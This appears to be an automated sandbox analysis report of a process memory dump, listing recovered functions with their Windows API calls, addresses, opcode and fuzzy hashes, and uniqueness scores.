Opcode ID: 70d8f13561b3c29453bc92afdb6e6a6486de3db215074d7b54748213329a2fe0
Instruction ID: 49a496cc3380110ff2edc57d4ee87b65bb7c09c416b3f9b4c6733ceae4674926
Opcode Fuzzy Hash: 70d8f13561b3c29453bc92afdb6e6a6486de3db215074d7b54748213329a2fe0
Instruction Fuzzy Hash: 6F014FF690021CBFE710A7A09D89EE6776DD708301F0005A9BB45E2451EA749E868B74

Uniqueness

Uniqueness Score: -1.00%

Function 001CD74C, Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00142612: GetWindowLongW.USER32(?,000000EB), ref: 00142623

GetSystemMetrics.USER32 ref: 001CD78A
GetSystemMetrics.USER32 ref: 001CD7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 001CD9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 001CDA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 001CDA24
ShowWindow.USER32(00000003,00000000), ref: 001CDA43
InvalidateRect.USER32(?,00000000,00000001), ref: 001CDA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 001CDA8B

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 752fc78a4b4de97a8fd6ee67bf5c9e0ec2e99c2c9462cf46f39893b22c2a50a4
Instruction ID: 2b886e0230bd2abf5b5a5632caeb913c8935bc5f1307fd145fe0b61fe408bd33
Opcode Fuzzy Hash: 752fc78a4b4de97a8fd6ee67bf5c9e0ec2e99c2c9462cf46f39893b22c2a50a4
Instruction Fuzzy Hash: 19B18775600225ABDF18CF68D989BBD7BB2BF18700F09807DEC489B699D734E990CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00142A5B, Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0017C417,00000004,00000000,00000000,00000000), ref: 00142ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0017C417,00000004,00000000,00000000,00000000,000000FF), ref: 00142B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0017C417,00000004,00000000,00000000,00000000), ref: 0017C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0017C417,00000004,00000000,00000000,00000000), ref: 0017C4D6

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 7ab2476a088f64db26a808aee3582a8ce2f3943d87dc5aebf14eb2bf0a78d61f
Instruction ID: 9497964391c994e9f34ec82656266683d27cdfed1b095fc74489cce33c6bca1c
Opcode Fuzzy Hash: 7ab2476a088f64db26a808aee3582a8ce2f3943d87dc5aebf14eb2bf0a78d61f
Instruction Fuzzy Hash: 3241E6312087809AC7398B289C9CB7A7BA2AB96310FB5C81DF84B87D71C77598C6D751

Uniqueness

Uniqueness Score: -1.00%

Function 001C6442, Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 001C645A
GetDC.USER32(00000000), ref: 001C6462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001C646D
ReleaseDC.USER32 ref: 001C6479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001C64B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001C64C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001C9299,?,?,000000FF,00000000,?,000000FF,?), ref: 001C6500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001C6520

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: f92ff5ea646486dfa75f10f39150496108ce1ae401c9c1adff927203f2866fa6
Instruction ID: f5c95a1258494e81f3e4c55ab23595ecb22f4bbf6e0f894916b74578a9cbf46e
Opcode Fuzzy Hash: f92ff5ea646486dfa75f10f39150496108ce1ae401c9c1adff927203f2866fa6
Instruction Fuzzy Hash: 3F317176101214BFEB118F50CC4AFEA3FAAEF19761F044069FE089A291D775DC42CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0019C072, Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0019C087
_memcmp.LIBCMT ref: 0019C0A9
_memcmp.LIBCMT ref: 0019C0C1
_memcmp.LIBCMT ref: 0019C0D4
_memcmp.LIBCMT ref: 0019C0EE
_memcmp.LIBCMT ref: 0019C101
_memcmp.LIBCMT ref: 0019C119
_memcmp.LIBCMT ref: 0019C134

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: dea7491aa36f6abc1bf2ca4a8b5162fcd136d01b0cfa38c3ceb4efc3574750bd
Instruction ID: 4c53b03b4627b7e222291f632e9c774c98a74a756a2fdf7fef1e44467d9b598a
Opcode Fuzzy Hash: dea7491aa36f6abc1bf2ca4a8b5162fcd136d01b0cfa38c3ceb4efc3574750bd
Instruction Fuzzy Hash: 9721A179A01205BBEA14A921CD46FBF339DAF303A4F0C4021FD8596382E7A1DE2186F5

Uniqueness

Uniqueness Score: -1.00%

Function 001AED8E, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00149997: __itow.LIBCMT ref: 001499C2
Part of subcall function 00149997: __swprintf.LIBCMT ref: 00149A0C

Part of subcall function 0015FEC6: _wcscpy.LIBCMT ref: 0015FEE9

_wcstok.LIBCMT ref: 001AEEFF
_wcscpy.LIBCMT ref: 001AEF8E
_memset.LIBCMT ref: 001AEFC1

Strings

X, xrefs: 001AEFFE

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 7d662dca6369d14f41389ef1f0a7302e8e81b44ad947180fbc3852d77e4a57c4
Instruction ID: 420b1bd40d17b2b55b71aee4f75a30e03640a6a03fb3f83137467b445646749c
Opcode Fuzzy Hash: 7d662dca6369d14f41389ef1f0a7302e8e81b44ad947180fbc3852d77e4a57c4
Instruction Fuzzy Hash: 27C18C756083009FCB24EF64C981A6BB7E5FF95310F14492DF8999B2A2DB30ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001B6E17, Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001B6F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001B6F35
WSAGetLastError.WSOCK32(00000000), ref: 001B6F48
htons.WSOCK32(?,?,?,00000000,?), ref: 001B6FFE
inet_ntoa.WSOCK32(?), ref: 001B6FBB

Part of subcall function 0019AE14: _strlen.LIBCMT ref: 0019AE1E
Part of subcall function 0019AE14: _memmove.LIBCMT ref: 0019AE40

_strlen.LIBCMT ref: 001B7058
_memmove.LIBCMT ref: 001B70C1

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 6c524e83a9597f4cd042b4d1a20254d8bcc5d8a8ffe073507ad4ae9b24df2c7e
Instruction ID: 47d80c1eef00fffebc3e9c0d77a6742d6ef9a00c31e9046a393dd76737d617ff
Opcode Fuzzy Hash: 6c524e83a9597f4cd042b4d1a20254d8bcc5d8a8ffe073507ad4ae9b24df2c7e
Instruction Fuzzy Hash: EB81CC71508300ABD710EF24CC82EAFB7A9AFA5714F14891DF5559B2E2DB70ED05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00141424, Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fbf617021fe72651ba12290769e46cb5b7c737e3d3cff4906cafcb6d78895fa
Instruction ID: cf3dcda71c79a6a72abbf63ebb08fe40ce0d4bf88954d95bc4247207f35192b4
Opcode Fuzzy Hash: 8fbf617021fe72651ba12290769e46cb5b7c737e3d3cff4906cafcb6d78895fa
Instruction Fuzzy Hash: 7E715C71904109FFCB14DF98CC89EBEBB79FF85314F248159F915AA261C734AA91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001CB60B, Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00AA6F70), ref: 001CB6A5
IsWindowEnabled.USER32(00AA6F70), ref: 001CB6B1
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 001CB795
SendMessageW.USER32(00AA6F70,000000B0,?,?), ref: 001CB7CC
IsDlgButtonChecked.USER32(?,?), ref: 001CB809
GetWindowLongW.USER32(00AA6F70,000000EC), ref: 001CB82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001CB843

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: c646258579b51bc2f4ecf7adf3994dcf0cfd8b2090227c4eeb8e8f8de344f7b3
Instruction ID: 7974a7ed93dcdcdd5a2b3c1afd844dd3e36b6d15dbaf43fd81aa236e6c8e5cc4
Opcode Fuzzy Hash: c646258579b51bc2f4ecf7adf3994dcf0cfd8b2090227c4eeb8e8f8de344f7b3
Instruction Fuzzy Hash: A9718A74608314AFDB259F64C8DAFAABBB9EB69300F14406DE945D72A1C731E891CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001BF732, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001BF75C
_memset.LIBCMT ref: 001BF825
ShellExecuteExW.SHELL32(?), ref: 001BF86A

Part of subcall function 00149997: __itow.LIBCMT ref: 001499C2
Part of subcall function 00149997: __swprintf.LIBCMT ref: 00149A0C

Part of subcall function 0015FEC6: _wcscpy.LIBCMT ref: 0015FEE9

GetProcessId.KERNEL32(00000000), ref: 001BF8E1
CloseHandle.KERNEL32(00000000), ref: 001BF910

Strings

@, xrefs: 001BF839

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 29ff1d6de28c69864b2d030130e7658afcc7e39d5a319c126f3b018ccb6044c7
Instruction ID: eadcf1abe9aab273b8e790975d8471192eabcc223b4ed175d2052ae655e2fac3
Opcode Fuzzy Hash: 29ff1d6de28c69864b2d030130e7658afcc7e39d5a319c126f3b018ccb6044c7
Instruction Fuzzy Hash: 93618F75A00619DFCF14DF64C885AAEBBF5FF58314B14846DE85AAB361CB30AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001A145D, Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001A149C
GetKeyboardState.USER32(?), ref: 001A14B1
SetKeyboardState.USER32(?), ref: 001A1512
PostMessageW.USER32(?,00000101,00000010,?), ref: 001A1540
PostMessageW.USER32(?,00000101,00000011,?), ref: 001A155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 001A15A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 001A15C8

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 5cd15a6587bb3ce065850eaa65c2e73e718d771df9ba48828a8ea13baa8392c6
Instruction ID: 50f8a8b7e246c1ca98216f4c02e734e74e115e2eaef659b1dd8068cef9470500
Opcode Fuzzy Hash: 5cd15a6587bb3ce065850eaa65c2e73e718d771df9ba48828a8ea13baa8392c6
Instruction Fuzzy Hash: DA51E3A4A047D53EFB3646788C45BBABEAA5B47304F0C8589E5D9868C3C3D4ECC8D750

Uniqueness

Uniqueness Score: -1.00%

Function 001A1276, Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 001A12B5
GetKeyboardState.USER32(?), ref: 001A12CA
SetKeyboardState.USER32(?), ref: 001A132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001A1357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001A1374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001A13B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001A13D9

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d4d204bdbbef7d4689919c40506a7970d72ac8ac80b2896d0a0730bd66c76069
Instruction ID: 03832917318b5b4f43bfd502b602cf50e047d6fb2f3d7990fd0950bb31fda67a
Opcode Fuzzy Hash: d4d204bdbbef7d4689919c40506a7970d72ac8ac80b2896d0a0730bd66c76069
Instruction Fuzzy Hash: 2551E4A59447D53DFB3287348C55BBABFA96F07310F088589E1D48ACC2D395EC98D760

Uniqueness

Uniqueness Score: -1.00%

Function 001C7500, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001C7519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001C75C0
IsMenu.USER32 ref: 001C75D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001C7620
DrawMenuBar.USER32 ref: 001C7633

Strings

0, xrefs: 001C750D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 17dbb987c481e20d3cbdbb50f023ae0cc491816f2216dd45d0e28470df224844
Instruction ID: 901de41b8b27d37dcade3c6400efabd106b0645a07bda4e7c6cb7ef92f65589f
Opcode Fuzzy Hash: 17dbb987c481e20d3cbdbb50f023ae0cc491816f2216dd45d0e28470df224844
Instruction Fuzzy Hash: C04125B5A04609AFEB20DF54E884E9ABBF9FB18310F04812DE9159B290D770ED55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C122D, Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 001C125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001C1286
FreeLibrary.KERNEL32(00000000), ref: 001C133D

Part of subcall function 001C122D: RegCloseKey.ADVAPI32(?), ref: 001C12A3
Part of subcall function 001C122D: FreeLibrary.KERNEL32(?), ref: 001C12F5
Part of subcall function 001C122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 001C1318

RegDeleteKeyW.ADVAPI32(?,?), ref: 001C12E0

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: f8674d62ffb15597433e91abce1ab4c0e5502c1b8615ea484a8b3786057e7010
Instruction ID: 67161c1c6e839a25499e8ea53b417f75b74d222d57dc9729775a22de81d86724
Opcode Fuzzy Hash: f8674d62ffb15597433e91abce1ab4c0e5502c1b8615ea484a8b3786057e7010
Instruction Fuzzy Hash: 713169B5940109BFDB14DB90DC89EFEBBBDEF19310F10416EF501E2542EB709E869AA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C653C, Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001C655B
GetWindowLongW.USER32(00AA6F70,000000F0), ref: 001C658E
GetWindowLongW.USER32(00AA6F70,000000F0), ref: 001C65C3
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001C65F5
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001C661F
GetWindowLongW.USER32(?,000000F0), ref: 001C6630
SetWindowLongW.USER32 ref: 001C664A

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 6e6888c9f6488cedd01c18c6ec9ec788f782351f8964e636f9e8b6f720f2738c
Instruction ID: 547afb2acf563d0102fb71153fba04ce296dc352b8e8df4dc6bee699b83ed28d
Opcode Fuzzy Hash: 6e6888c9f6488cedd01c18c6ec9ec788f782351f8964e636f9e8b6f720f2738c
Instruction Fuzzy Hash: 58312470604221AFDB20CF18EC89F653BE1FB6A354F2941A8F5018B2B6CB71EC95DB41

Uniqueness

Uniqueness Score: -1.00%

Function 001B6486, Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001B80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001B80CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001B64D9
WSAGetLastError.WSOCK32(00000000), ref: 001B64E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001B6521
connect.WSOCK32(00000000,?,00000010), ref: 001B652A
WSAGetLastError.WSOCK32 ref: 001B6534
closesocket.WSOCK32(00000000), ref: 001B655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001B6576

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 23c4e00fc7b97b2c9a1dbe9f911a88ebc53280ec0f631a4dbe8e23426df42b84
Instruction ID: 670dfdf3dc3974abb6a5bb62a512df73e8a4be66f7832c52b4b08f23c28b50fa
Opcode Fuzzy Hash: 23c4e00fc7b97b2c9a1dbe9f911a88ebc53280ec0f631a4dbe8e23426df42b84
Instruction Fuzzy Hash: 9931BF31600218AFDB20AF24DC85FFE7BADEB54764F008069F909A7291CB74AD45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0019E0B5, Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0019E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0019E120
SysAllocString.OLEAUT32(00000000), ref: 0019E123
SysAllocString.OLEAUT32 ref: 0019E144
SysFreeString.OLEAUT32 ref: 0019E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 0019E167
SysAllocString.OLEAUT32(?), ref: 0019E175

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 96fe5ef897ca800b4c2913514ebf9cd308fac7819f6262bebd99ed1bafab03aa
Instruction ID: 42e29a47cbe87bd437e4e8813d78f5ba7565126d89e0a7e017774a4e8a78fdf6
Opcode Fuzzy Hash: 96fe5ef897ca800b4c2913514ebf9cd308fac7819f6262bebd99ed1bafab03aa
Instruction Fuzzy Hash: FA213E35604208AFDF14DFA8DC88DAB77EDEB09760B148139F915CB260DB71DC818B64

Uniqueness

Uniqueness Score: -1.00%

Function 001641C9, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00164292,?), ref: 001641E3
GetProcAddress.KERNEL32(00000000), ref: 001641EA
EncodePointer.KERNEL32(00000000), ref: 001641F6
DecodePointer.KERNEL32(00000001,00164292,?), ref: 00164213

Strings

combase.dll, xrefs: 001641DE
RoInitialize, xrefs: 001641D2

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: ec2d71f035bf4b032226baf1778e03a28cce692f317f2c597ae44e6ebbd2a8a4
Instruction ID: d5dd9e4ddb8798dc9f542a4142aba8ea46edf7acb44f2f4061a812b589642362
Opcode Fuzzy Hash: ec2d71f035bf4b032226baf1778e03a28cce692f317f2c597ae44e6ebbd2a8a4
Instruction Fuzzy Hash: 5CE012F0690340AFEB207BB4FC0DF047AA6BB61B02F108428F625E55A1DBB580E6CF00

Uniqueness

Uniqueness Score: -1.00%

Function 0016429E, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001641B8), ref: 001642B8
GetProcAddress.KERNEL32(00000000), ref: 001642BF
EncodePointer.KERNEL32(00000000), ref: 001642CA
DecodePointer.KERNEL32(001641B8), ref: 001642E5

Strings

combase.dll, xrefs: 001642B3
RoUninitialize, xrefs: 001642A7

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
